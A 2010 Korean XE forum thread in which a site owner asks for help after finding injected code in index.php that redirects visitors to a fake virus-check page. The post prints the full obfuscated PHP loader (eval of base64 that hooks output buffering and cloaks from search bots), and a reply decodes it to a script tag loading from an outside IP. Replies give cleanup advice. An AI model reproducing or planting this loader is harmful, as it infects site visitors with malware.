묻고답하기
사이트에 악성코드가 들어가 있는 것 같습니다.
2010.04.22 13:09
사이트에 악성코드가 들어가 있는 것 같습니다.
오늘 갑자기 사이트에 들어가니 이상한 바이러스체크하는 사이트로 넘어가고 컴퓨터에 바이러스가 있는 것 처럼 브라우저에 뜹니다.
그래서 zexe의 index.php안을 보니 상단에 이런 코드가 적혀 있습니다. 이걸 지워도 해결이 안 되네요...
<?php /**/ eval(base64_decode("aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21yX25vJ10pKXsgICAkR0
xPQkFMU1snbXJfbm8nXT0xOyAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ21yb2JoJykpeyAgICAgIGlmKCFmdW5jdGlvbl9leGlzdHMoJ2dtb
CcpKXsgICAgIGZ1bmN0aW9uIGdtbCgpeyAgICAgIGlmICghc3RyaXN0cigkX1NFUlZFUlsiSFRUUF9VU0VSX0FHRU5UIl0sImdvb2dsZWJ
vdCIpJiYgKCFzdHJpc3RyKCRfU0VSVkVSWyJIVFRQX1VTRVJfQUdFTlQiXSwieWFob28iKSkpeyAgICAgICByZXR1cm4gYmFzZTY0X2
RlY29kZSgiUEhOamNtbHdkQ0J6Y21NOUltaDBkSEE2THk4Mk1TNDBMamd5TGpJeE1pOXFjeTV3YUhBaVBqd3ZjMk55YVhCMFBnPT
0iKTsgICAgICB9ICAgICAgcmV0dXJuICIiOyAgICAgfSAgICB9ICAgICAgICBpZighZnVuY3Rpb25fZXhpc3RzKCdnemRlY29kZScpKXsgI
CAgIGZ1bmN0aW9uIGd6ZGVjb2RlKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEMpeyAgICAgICRSMzBCMkFCOE
RDMTQ5NkQwNkIyMzBBNzFEODk2MkFGNUQ9QG9yZChAc3Vic3RyKCRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4N
EMsMywxKSk7ICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOT0xMDsgICAgICAkUkEzRDUyRTUyQTQ4O
TM2Q0RFMEY1MzU2QkIwODY1MkYyPTA7ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCY0KXsgIC
AgICAgJFI2M0JFREU2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQj1AdW5wYWNrKCd2JyxzdWJzdHIoJFI1QTlDRjFCNDk3NTAyQUN
BMjNDOEY2MTFBNTY0Njg0QywxMCwyKSk7ICAgICAgICRSNjNCRURFNkIxOTI2NkQ0RUZFQUQwN0E0RDkxRTI5RUI9JFI2M0JFRE
U2QjE5MjY2RDRFRkVBRDA3QTREOTFFMjlFQlsxXTsgICAgICAgJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOSs9
MiskUjYzQkVERTZCMTkyNjZENEVGRUFEMDdBNEQ5MUUyOUVCOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OTZEMDZC
MjMwQTcxRDg5NjJBRjVEJjgpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5PUBzdHJwb3MoJFI1QT
lDRjFCNDk3NTAyQUNBMjNDOEY2MTFBNTY0Njg0QyxjaHIoMCksJFJCRTRDNEQwMzdFOTM5MjI2RjY1ODEyODg1QTUzREFEOS
krMTsgICAgICB9ICAgICAgaWYoJFIzMEIyQUI4REMxNDk2RDA2QjIzMEE3MUQ4OTYyQUY1RCYxNil7ICAgICAgICRSQkU0QzREMDM
3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDk9QHN0cnBvcygkUjVBOUNGMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLGNocig
wKSwkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5KSsxOyAgICAgIH0gICAgICBpZigkUjMwQjJBQjhEQzE0OT
ZEMDZCMjMwQTcxRDg5NjJBRjVEJjIpeyAgICAgICAkUkJFNEM0RDAzN0U5MzkyMjZGNjU4MTI4ODVBNTNEQUQ5Kz0yOyAg
ICAgIH0gICAgICAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPUBnemluZmxhdGUoQHN1YnN0cigkUjVBOUN
GMUI0OTc1MDJBQ0EyM0M4RjYxMUE1NjQ2ODRDLCRSQkU0QzREMDM3RTkzOTIyNkY2NTgxMjg4NUE1M0RBRDkpKTsgICAg
ICBpZigkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzPT09RkFMU0UpeyAgICAgICAkUjAzNEFFMkFCOTRGOTl
DQzgxQjM4OUExODIyREEzMzUzPSRSNUE5Q0YxQjQ5NzUwMkFDQTIzQzhGNjExQTU2NDY4NEM7ICAgICAgfSAgICAgIHJldH
VybiAkUjAzNEFFMkFCOTRGOTlDQzgxQjM4OUExODIyREEzMzUzOyAgICAgfSAgICB9ICAgIGZ1bmN0aW9uIG1yb2JoKCRSR
TgyRUU5QjEyMUY3MDk4OTVFRjU0RUJBN0ZBNkI3OEIpeyAgICAgSGVhZGVyKCdDb250ZW50LUVuY29kaW5nOiBub25lJyk7ICA
gICAkUkExNzlBQkQzQTdCOUUyOEMzNjlGN0I1OUM1MUI4MURFPWd6ZGVjb2RlKCRSRTgyRUU5QjEyMUY3MDk4OTVFRjU0RU
JBN0ZBNkI3OEIpOyAgICAgICBpZihwcmVnX21hdGNoKCcvXDxcL2JvZHkvc2knLCRSQTE3OUFCRDNBN0I5RTI4QzM2OUY3QjU5
QzUxQjgxREUpKXsgICAgICByZXR1cm4gcHJlZ19yZXBsYWNlKCcvKFw8XC9ib2R5W15cPl0qXD4pL3NpJyxnbWwoKS4iXG4iLick
MScsJFJBMTc5QUJEM0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERSk7ICAgICB9ZWxzZXsgICAgICByZXR1cm4gJFJBMTc5QUJE
M0E3QjlFMjhDMzY5RjdCNTlDNTFCODFERS5nbWwoKTsgICAgIH0gICAgfSAgICBvYl9zdGFydCgnbXJvYmgnKTsgICB9ICB9"));?>
어떻게 하면 될까요? 빨리 해결하고 싶은데....
여기에 올리니 이렇게 짤려서 보이네요.. php파일을 첨부파일로 올렸습니다 확인 좀 해주세요.!!!!! 제발 부탁드립니다.
댓글 3
-
현원
2010.04.22 14:12
-
ㅊㅊㅋ
2010.04.22 14:17
제 컴퓨터는 문제가 없습니다. 사이트에 문제가 있습니다. -
카르마
2010.04.22 14:23
저 코드의 내용은
<script src="h tt p :// 61.4.82.212 / js. php "></script>
로 이동시켜서 접속자의 컴퓨터에 해킹툴을 심어놓는 것같습니다.
님의 서버 어딘가에 저 코드를 삽입하는 스크립트가 숨겨져 있을 겁니다.
그걸 찾아서 지우셔야합니다.
index.php만 수정하면 또올라오고 또올라옵니다.
-
ㅊㅊㅋ
2010.04.22 14:32
감사합니다. 근데 저 해킹툴 제가 파일하나 일일이 찾아야 하나요? 빠르게 찾는 방법 없을까요? -
앙띠2
2010.04.22 15:37
저도 같은건 아니지만 바이러스 걸렷더랬습니다.
그래서 일일이 찾아 헤매다가 포기하고 만약을 위하여 파일을 모두 백업 받고,
싸그리 전부다 삭제 해버리고,
깨끗한 XE를 새로 받아 업로드하고,
위젯, 모듈들 전부 새로 받아서 업로드하고,
다운 받은 것중, File 폴더를 업로드하고,
새로 받을수 없거나, 내가 수정하여 만든 php 파일은 오두 Open하여 악성 코드 지우고 하여 복구 하엿습니다.
그리고 님의 컴퓨터에 바이러스 잇는지 반드시 확인 하셔야 합니다.
바이러스 있는 컴퓨터에서 FTP접속하시면 접속 순간에 FTP 의 ID,PW가 빠져 나가고, 이걸이용하여 바이러스 심어 놓습니다.
그러니 지금 당장, 컴퓨터 바이러스 체크 반드시 하시고, 이미 FTP의 ID,PW 는 유출 되었다고 보시고, ID,PW 를 바꾸시길 권합니다.
윗분이 컴퓨터 부터 확인 하라는건 이걸 의미 합니다.
-
ㅊㅊㅋ
2010.04.23 10:17
네. 알겠습니다. 감사합니다.
님 컴부터 바이러스 검사해보시는게 좋겠습니다. 아무래도.